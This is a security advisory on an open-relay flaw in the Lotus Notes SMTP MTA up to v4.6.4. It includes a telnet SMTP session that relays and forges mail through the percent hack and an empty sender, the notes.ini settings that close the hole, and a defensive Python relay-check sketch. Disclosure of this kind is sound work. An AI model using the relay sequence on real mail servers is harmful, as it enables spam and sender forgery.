Vulnerability

Lotus Notes

Affected

Lotus Notes MTA (up to v4.6.4)

Description

Robert Lister found the following. Following the vulnerability about NTMail having open relaying ability in certain situations, as described at:

    http://oliver.efri.hr/~crv/security/bugs/NT/ntmail2.html

Robert has identified a problem with the Lotus SMTP MTA (right up to v4.6.4, yet to test Domino 5). Basically, it's possible to relay (and even appear to "forge" a message) using a combination of the percent hack and the blank from address, and this is *despite* having changed the notes.ini with the settings for anti-relaying:

    telnet server 25
    Connected to 192.168.100.1.
    Escape character is '^]'.
    220 company.com Lotus SMTP MTA Service Ready
    HELO some.domain
    250 company.com
    MAIL FROM:<>
    250 OK
    RCPT TO:<recipient%remote.domain.net@company.com>
    250 OK
    DATA
    From: ... etc whaterver you like..
    .
    250 Message received OK.
    quit
    221 GoodBye

The bad bit of this is that Notes seems to strip out previous headers (depending on how it's configured) and add new outgoing Notes headers. It even goes as far as expanding cc: headers and permitting sending to Notes mailing lists, etc., making it look like the mail originated from the Notes domain itself. It also takes whatever you put in the "From: " header and presents this in its outgoing "MAIL FROM:<>".

It seems that the Lotus SMTP MTA also likes to accept any mail for any domain and then, only having accepted it, make a decision as to what to do with it. If it decides that it cannot relay it, it generates a message back to the "sender" saying that "this server will not relay". However, 9 times out of 10 the remote domain won't exist, so this message will fail - as opposed to responding with, say, "5xx relaying not permitted" before accepting the message. Possibly not the best use of the protocol!

Solution

Lotus support has been contacted and they have confirmed that this is an issue and are looking into it. The relay described above will work UNLESS the two notes.ini settings below are set:

    smtpmta_allow_known_domains=1
    smtp_och_reject_smtp_originated_messages=1

So:

    Connected to 192.168.100.1.
    Escape character is '^]'.
    220 company.com Lotus SMTP MTA Service Ready
    HELO some.company
    250 company.com
    MAIL FROM:<>
    250 OK
    RCPT TO:<recipient%remote.domain.net@company.com.com>
    501 This MTA is configured NOT to relay message from [some.server.com] to [company.com.com].
    quit
    221 GoodBye

This is a new SMTPMTA setting from R4.6.4 onward (the tested server still permits relaying using the mentioned percent hack, IF the domain after the @ sign is the same as the server's domain name).
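The relay decision the Description asks for, made at RCPT TO rather than after the message is accepted, is sketched below. This is an added example, not Lotus code or part of the original advisory: it resolves the percent hack to the address the MTA would really route to and answers with a 5xx before DATA. LOCAL_DOMAINS, the function names and the reply texts are assumptions.

```python
# Added example: RCPT-time relay check that unwraps the percent hack first.
# LOCAL_DOMAINS, function names and reply texts are illustrative assumptions.
LOCAL_DOMAINS = {"company.com"}


def effective_recipient(path):
    """Return (local_part, domain) the message would finally be routed to."""
    addr = path.strip().lstrip("<").rstrip(">")
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError("malformed recipient path")
    domain = domain.lower().rstrip(".")
    # user%remote@local is re-read as user@remote only when the outer domain
    # is one of ours, so unwrap under exactly that condition (handles nesting).
    while domain in LOCAL_DOMAINS and "%" in local:
        local, _, domain = local.rpartition("%")
        domain = domain.lower().rstrip(".")
    if not local or not domain:
        raise ValueError("malformed recipient path")
    return local, domain


def rcpt_decision(path, client_is_trusted=False):
    """SMTP reply for RCPT TO, decided before any message data is accepted."""
    try:
        _, domain = effective_recipient(path)
    except ValueError:
        return 501, "Syntax error in recipient path"
    if domain in LOCAL_DOMAINS or client_is_trusted:
        return 250, "OK"
    # Refuse here instead of accepting and bouncing to a sender address
    # that may be empty or forged.
    return 550, "Relaying not permitted"


if __name__ == "__main__":
    # Constructed sample paths, modelled on the sessions above.
    for p in ("<user@company.com>",
              "<recipient%remote.domain.net@company.com>",
              "<recipient%remote.domain.net@company.com.com>"):
        print(p, rcpt_decision(p))
```
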